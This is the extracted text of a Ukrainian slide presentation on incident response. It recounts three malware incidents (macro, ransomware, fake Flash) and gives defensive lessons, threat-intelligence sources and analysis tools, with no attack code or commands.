    Хто з васпроводить розслідування по детекту ? * по кожному спрацюванню систем захисту А звідки ви впевнені що АВ не впіймав лише хвіст ? Реагування на інциденти
  • 75.
    Три історії зпрактики
  • 76.
  • 77.
  • 78.
    Історія #1 “Макрос”- 14.03.18 • Хтось відкриває документ 2013го року • Спрацьовує макрос – пандемія (файли .doc) • Розслідування, розстріли • За 5 годин усі документи на х00 системах інжектовано • А якби це був #Pony або Ransom ? • …
  • 79.
  • 80.
  • 81.
  • 82.
  • 83.
    Історія #2 “Впертийransomware” • Жертва отримує фішинг із приманкою • Запускається ransomware • “Ааааа, ваш антивірус пропустив…” • Надаю людині маркери + контрзаходи • Рекурсія, рекурсія, (сумно, боляче) • Зашифровано систему керівника • “То шо ви там казали, який параметр поставити?”
  • 84.
    Історія #3 “Страхабо як роблять новини про ІБ”
  • 85.
    Історія #3 “Страхабо як роблять новини про ІБ”
  • 86.
    Історія #3 “Страхабо як роблять новини про ІБ” • Хтось “качає” щось .. ок, це був фейковий AdobeFlash • Зараження, виведення АРМ з ладу • Чутки поширюються зі швидкістю світла • В одному міністерстві вирішують вимкнути сервери • Журналіст намагається зайти на сайт міністерства • 502 = “Ааааа! Хакери поламали міністерство”
  • 87.
  • 88.
    Висновки #1 • Інструкціїна випадок атаки • Автономне прийняття рішень та контрзаходів • Службові розслідування, форензика • Мінімізація втрат • Навчання персоналу
  • 89.
    Висновки #2 • Оновлення/виправленняMS Office та Windows ! ! ! • Блок створення / запуску C:Users***.exe • Контроль/блок WSH, PowerShell, HTA, CMD, MS Office • Посилена фільтрація Web та Email • Відмова від RTF, макросів, JRE, Flash
  • 90.
    Запитання ? #IOC тазвіти шукайте тут: radetskiy.wordpress.com
  • 91.
    • Twitter • https://twitter.com/malwrhunterteam •https://twitter.com/James_inthe_box • https://twitter.com/DissectMalware • https://twitter.com/Techhelplistcom • https://twitter.com/malware_traffic • Blogs & Media • https://embedi.com/blog/ • https://www.wired.com/category/threatlevel/ • https://arstechnica.com/information-technology/2018/ • https://threatpost.com/ • https://security.googleblog.com/ • https://www.schneier.com/ • https://krebsonsecurity.com/ • https://www.troyhunt.com/ Джерела інформації:
  • 92.
    • VirtualBox • SysInternalsSuite, PSTools • Nirsoft tools • oletools (python) • Wireshark, Fiddler • Pestudio, Explorer Suite, PE Explorer Інструменти:
  • 93.